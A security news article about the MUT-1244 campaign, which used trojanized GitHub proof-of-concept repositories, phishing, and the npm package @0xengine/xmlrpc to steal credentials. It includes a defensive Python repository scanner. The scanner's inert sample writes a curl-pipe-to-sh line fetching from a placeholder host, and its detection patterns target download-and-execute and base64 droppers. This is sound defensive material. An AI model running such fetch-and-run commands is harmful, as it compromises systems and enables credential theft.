Year-Long Supply Chain Attack on Security Professionals Compromises 390,000 Credentials

Malware Campaign Exploits GitHub and Phishing Strategies to Deploy Attacks

Datadog Security Labs has described a threat cluster it tracks as MUT-1244 that delivers its payloads through a combination of social engineering and abuse of legitimate platforms. The campaign, disclosed only recently but running for about a year, illustrates how threat actors now pair supply-chain lures with conventional phishing.

The researchers found that MUT-1244 delivered its second-stage malware through at least 49 GitHub repositories hosting trojanized proofs-of-concept for well-known vulnerabilities. Proof-of-concept code is exactly what security professionals fetch and run to understand how a vulnerability is exploited or mitigated, which made these repositories an effective lure: the target's normal workflow is to clone and execute them.

Phishing was the campaign's other major vector. Datadog's research shows that MUT-1244 used a phishing template together with a list of over 2,700 email addresses scraped from arXiv, the preprint repository widely used by academic and professional researchers, to target people working in high-performance computing. The emails urged recipients to install a supposed CPU microcode update promising substantial performance gains and were sent between October 5 and October 21.

The messages were tailored to people who develop and run research software, which added to their credibility. The GitHub side of the campaign gained credibility of its own: several of the trojanized repositories were picked up by threat-intelligence feeds such as Feedly Threat Intelligence and Vulnmon as sources of exploit code. Being listed there lent them an air of legitimacy and raised the odds that someone would clone and run the malicious code without a second look.

The backdoor delivered through the @0xengine/xmlrpc npm package was used to steal roughly 390,000 credentials from compromised machines. According to the investigation, these were WordPress credentials, that is, logins for the administrative accounts of sites running the WordPress content management system, which gives a sense of the scale of the theft.
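As an added example (not Datadog's, Checkmarx's, or the attackers' code), the following Python script applies the kind of pre-build triage a reviewer might run against a freshly cloned proof-of-concept repository, covering both delivery paths described above: it flags npm install-time hooks and dependencies matching a known-bad list seeded with the one package name this article gives, @0xengine/xmlrpc, and it searches build and helper scripts for download-and-execute pipelines, base64 decoding, and long base64 blobs. The sample repository it scans is constructed inline and inert; the rule names, size threshold, and list of install-time files are assumptions of this example, not published indicators, and a hit is a lead for manual review rather than a verdict.

```python
import json
import re
import tempfile
from pathlib import Path

# Seeded with the one package name this article gives; extend from the
# published Datadog/Checkmarx IOC lists before real use (assumption: not complete).
KNOWN_BAD_NPM = {"@0xengine/xmlrpc"}

# npm runs these scripts automatically during `npm install`.
NPM_LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Files that execute while building or installing a typical PoC (assumed list).
INSTALL_TIME_FILES = {"configure", "setup.py", "Makefile", "install.sh", "build.sh"}

# Cheap textual signals of a dropper in a build or helper script (assumed heuristics).
SUSPICIOUS_PATTERNS = {
    "download-and-execute": re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba)?sh\b"),
    "base64-decode": re.compile(r"\bbase64\s+(-d|--decode)\b|\bb64decode\("),
    "long-base64-blob": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
}

MAX_FILE_BYTES = 2_000_000  # large binaries get a manual look instead of a regex


def dependency_names(manifest: dict) -> set[str]:
    """Dependency names from a package.json or a package-lock.json (v2/v3) document."""
    names: set[str] = set()
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        names.update(manifest.get(section, {}).keys())
    for key in manifest.get("packages", {}):  # lockfile keys look like "node_modules/@scope/name"
        if "node_modules/" in key:
            names.add(key.rsplit("node_modules/", 1)[1])
    return names


def scan_manifest(path: Path, root: Path) -> list[dict]:
    """Flag install-time hooks and known-bad dependencies in an npm manifest."""
    rel = str(path.relative_to(root))
    try:
        manifest = json.loads(path.read_text(encoding="utf-8", errors="ignore"))
    except json.JSONDecodeError:
        return [{"file": rel, "rule": "unparseable-manifest", "detail": ""}]
    if not isinstance(manifest, dict):
        return []
    findings = []
    scripts = manifest.get("scripts", {})
    for hook in NPM_LIFECYCLE_HOOKS:
        if hook in scripts:
            findings.append({"file": rel, "rule": "npm-lifecycle-hook", "detail": f"{hook}: {scripts[hook]}"})
    for name in sorted(dependency_names(manifest) & KNOWN_BAD_NPM):
        findings.append({"file": rel, "rule": "known-bad-dependency", "detail": name})
    return findings


def scan_repo(root: Path) -> list[dict]:
    """Walk a cloned repository; return heuristic findings (leads, not verdicts)."""
    findings: list[dict] = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or ".git" in path.parts:
            continue
        if path.name in ("package.json", "package-lock.json"):
            findings.extend(scan_manifest(path, root))
            continue
        if path.stat().st_size > MAX_FILE_BYTES:
            continue
        text = path.read_text(encoding="utf-8", errors="ignore")
        for rule, pattern in SUSPICIOUS_PATTERNS.items():
            match = pattern.search(text)
            if match:
                findings.append({
                    "file": str(path.relative_to(root)),
                    "rule": rule,
                    "detail": match.group(0)[:80],
                    # a hit in a file that runs on build/install is the more urgent kind
                    "install_time": path.name in INSTALL_TIME_FILES,
                })
    return findings


def build_sample_repo(dest: Path) -> Path:
    """Write a constructed, inert repository showing the patterns above (sample data)."""
    (dest / "exploit.py").write_text("print('placeholder PoC, does nothing')\n")
    (dest / "configure").write_text(
        "#!/bin/sh\n"
        "# constructed: a build script that fetches and runs a remote script\n"
        "curl -fsSL http://example.invalid/setup.sh | sh\n"
    )
    (dest / "package.json").write_text(json.dumps({
        "name": "sample-poc",
        "scripts": {"postinstall": "node ./helper.js"},
        "dependencies": {"@0xengine/xmlrpc": "1.0.0"},
    }))
    return dest


def demo() -> list[dict]:
    """Scan the constructed sample repository in a temporary directory."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_repo(build_sample_repo(Path(tmp)))


if __name__ == "__main__":
    for f in demo():
        flag = " [install-time]" if f.get("install_time") else ""
        print(f"{f['rule']:<22} {f['file']}{flag}: {f['detail']}")
```

Run it against a real clone with `scan_repo(Path("/path/to/clone"))` before executing anything in the repository. The `install_time` flag matters: a download-and-execute line in `configure` or `setup.py` fires the moment the PoC is built, whereas the same line in the exploit body only runs when the PoC is deliberately launched.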

The sophistication of the campaign, marked by its long duration, its precise targeting, and the capabilities of the backdoor, suggests a skilled and motivated group. The attackers did, however, make a critical operational-security mistake: they left a phishing email template and the scraped email addresses in a public repository, which helped researchers identify and track their activity.

Despite the evident organization of the attack, the threat actors' motives remain unclear. The cryptocurrency miners they deployed point to financial gain, yet security personnel are an unusual target for mining operations, and miners are among the most readily detected payloads. Why researchers were singled out, and what role they play in the attackers' strategy, remains an open question.

As organizations assess the implications of this campaign, the indicators of compromise published in the Checkmarx and Datadog reports can help determine whether they were affected. Mapping the tactics and techniques involved to the MITRE ATT&CK framework lets defenders understand the nature of the threat and evaluate their own security posture against it.

In a fast-evolving threat landscape, remaining vigilant against phishing and treating code pulled from public repositories with caution is essential for every organization. The MUT-1244 campaign is a reminder of how sophisticated adversaries have become and of the value of proactive security measures.
